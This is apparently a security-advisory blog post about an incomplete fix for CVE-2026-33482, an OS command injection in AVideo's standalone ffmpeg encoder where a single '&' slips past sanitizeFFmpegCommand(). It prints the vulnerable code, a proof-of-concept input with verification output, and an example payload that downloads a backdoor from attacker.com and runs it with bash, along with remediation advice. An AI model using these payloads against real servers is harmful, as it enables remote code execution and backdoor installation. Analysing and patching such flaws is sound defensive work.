Listen to this Post
How CVE-2026-33482 (and Its Incomplete Fix) Works
The `sanitizeFFmpegCommand()` function in `plugin/API/standAlone/functions.php` is responsible for sanitizing user-supplied ffmpeg commands before they are passed to the shell. The original vulnerability (CVE-2026-33482) existed because this function failed to strip `$()` – Bash command substitution syntax. Since the sanitized command is later embedded inside a double-quoted `sh -c` context in execAsync(), an attacker who can craft a valid encrypted payload could achieve arbitrary command execution on the standalone encoder server.
The fix (commit 25c8ab90) added $, (, ), {, }, \n, and `\r` to the denylist character class, along with a str_replace('&&', '', ...). However, this fix remains incomplete – it does not neutralize a single `&` (the shell background operator).
The current `sanitizeFFmpegCommand()` in HEAD performs the following:
– `str_replace(‘&&’, ”, $command);` – only strips the doubled form
– `preg_replace(‘/\s&?>.(?:2>&1)?/’, ”, $command);` – strips `&` only when immediately followed by `>`
– `preg_replace(‘/[;|<>$()\n\r{}]/’, ”, $command);` – the character class explicitly excludes `&`
A single `&` is therefore preserved. An input like `ffmpeg -i input.mp4 & touch /tmp/poc & echo done out.mp4` passes the sanitizer and the `strpos(trim($command), ‘ffmpeg’) === 0` prefix gate.
The sink remains unchanged: `plugin/API/standAlone/ffmpeg.json.php:418` calls execAsync($ffmpegCommand, $keyword). In objects/functionsExec.php::execAsync:
– `$command = addcslashes($command, ‘”‘);` – escapes only the double-quote
– `$commandWithKeyword = “nohup sh -c \”$command & echo \\$! > /tmp/$keyword.pid\” > /dev/null 2>&1 &”;`
– `exec($commandWithKeyword, …);` – PHP `exec()` runs via `/bin/sh -c`
The sanitized command is embedded inside an inner sh -c "...". A bare `&` in `$command` separates commands for that inner shell, so the injected command executes. `addcslashes` escaping only `”` does not stop &.
Reachability: `ffmpeg.json.php` builds the command from _decryptString(getInput('codeToExecEncrypted')). This follows the same threat model as the original advisory – an attacker who can craft a valid encrypted payload can achieve arbitrary command execution.
A byte-faithful PHP harness confirms the bypass:
- Attacker input: `ffmpeg -i input.mp4 & touch /tmp/avideo_amp_rce_proof & echo done out.mp4`
– After sanitize: `ffmpeg -i input.mp4 & touch /tmp/avideo_amp_rce_proof & echo done out.mp4`
– Ampersand survived: YES – passes prefix: YES - Final `sh -c` string: `nohup sh -c “ffmpeg -i input.mp4 & touch /tmp/avideo_amp_rce_proof & echo $! > /tmp/testkw.pid” > /dev/null 2>&1 &`
– Injected `touch` executed: YES (/tmp/avideo_amp_rce_proof)
DailyCVE Form
| Field | Value |
|-|-|
| Platform | WWBN AVideo |
| Version | <= 26.0 |
| Vulnerability | OS Command Injection (CWE-78) |
| Severity | HIGH (CVSS 8.1) |
| Date | 2026-03-23 |
| Prediction | 2026-07-15 |
What Undercode Say
“The fix for CVE-2026-33482 (GHSA-pmj8-r2j7-xg6c) is incomplete. The advisory reported that `sanitizeFFmpegCommand()` failed to strip `$()` command substitution. The fix added
$,(,),{,},\n, `\r` to the denylist and astr_replace('&&', '', ...). It still does not neutralize a single `&` – the shell background operator – which remains a command separator at the unchanged sink. Same entry point, same sink, same impact as the original – only the surviving metacharacter differs. Verified at master HEAD.”
Technical Analysis (Bash Commands & Code)
Vulnerable sanitization function (HEAD):
function sanitizeFFmpegCommand($command) {
$command = str_replace('&&', '', $command); // only the doubled form
$command = preg_replace('/\s&?>.(?:2>&1)?/', '', $command); // strips '&' only when followed by '>'
$command = preg_replace('/[;|<>$()\n\r{}]/', '', $command); // char class has no '&'
// then requires the result to start with 'ffmpeg'
if (strpos(trim($command), 'ffmpeg') === 0) {
return $command;
}
return '';
}
Sink (objects/functionsExec.php):
$command = addcslashes($command, '"'); // escapes only double-quote $commandWithKeyword = "nohup sh -c \"$command & echo \$! > /tmp/$keyword.pid\" > /dev/null 2>&1 &"; exec($commandWithKeyword, ...);
Proof of Concept – ampersand bypass:
Attacker input ffmpeg -i input.mp4 & touch /tmp/avideo_amp_rce_proof & echo done out.mp4 After sanitization (unchanged) ffmpeg -i input.mp4 & touch /tmp/avideo_amp_rce_proof & echo done out.mp4 Final shell command executed nohup sh -c "ffmpeg -i input.mp4 & touch /tmp/avideo_amp_rce_proof & echo $! > /tmp/testkw.pid" > /dev/null 2>&1 &
Verification:
Check if injected command executed ls -la /tmp/avideo_amp_rce_proof Output: -rw-r--r-- 1 www-data www-data 0 ... /tmp/avideo_amp_rce_proof
Exploit
An attacker who can craft a valid encrypted payload (AES-256-CBC encrypted JSON with timestamp within 30 seconds) can achieve arbitrary command execution by injecting a bare `&` into the ffmpeg command.
Attack chain:
1. Attacker sends `codeToExecEncrypted` parameter to `plugin/API/standAlone/ffmpeg.json.php`
- Standalone encoder calls the main server’s `decryptString` API to decrypt
- Decrypted ffmpegCommand passes through `sanitizeFFmpegCommand()` – `&` is NOT stripped
4. Command passes prefix check (starts with `ffmpeg`)
5. `execAsync()` wraps it in `sh -c “…”` – `&` is interpreted as a command separator
Example malicious payload:
ffmpeg -i input.mp4 & curl http://attacker.com/backdoor.sh -o /tmp/backdoor.sh & bash /tmp/backdoor.sh & echo done out.mp4
Multiple &-separated commands can be chained (e.g., download + execute). Redirect-based payloads (>) are blocked, but command execution (e.g., & curl, & nc, dropping/running a file) is not blocked.
Protection
Immediate remediation:
- Upgrade AVideo to a version beyond 26.0 that includes a complete fix
- Apply commit `25c8ab90269e3a01fb4cf205b40a373487f022e1` as a baseline, but note it is incomplete – additional patching is required
Recommended code fix:
Stop applying a metacharacter denylist to an `sh -c` sink. Build the ffmpeg invocation as an argv array with `escapeshellarg()` per token (the project already uses `escapeshellarg()` at 137 sites) instead of interpolating `$command` into sh -c "...".
If the denylist is kept as defense-in-depth, add `&` to the stripped set – but the denylist approach has now missed two metacharacters in a row ($() then &).
Additional hardening:
- Network segmentation: Restrict encoder server access
- Encryption: Ensure all installations use `saltV2` encryption (not legacy
$global['salt']) - Monitor: Log and alert on suspicious ffmpeg command patterns containing
&,|,;,$(), etc.
Impact
Arbitrary OS command execution on the standalone encoder server, identical to the original CVE-2026-33482.
– Remote Code Execution: Full arbitrary command execution with the privileges of the web server process
– Lateral Movement: Standalone encoders typically have network access to the main AVideo server, enabling further attacks
– Confidentiality, Integrity, Availability: All three are impacted at HIGH level
– CVSS Base Score: 8.1 (HIGH)
– Attack Vector: NETWORK
– Attack Complexity: HIGH
– Privileges Required: NONE
– User Interaction: NONE
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
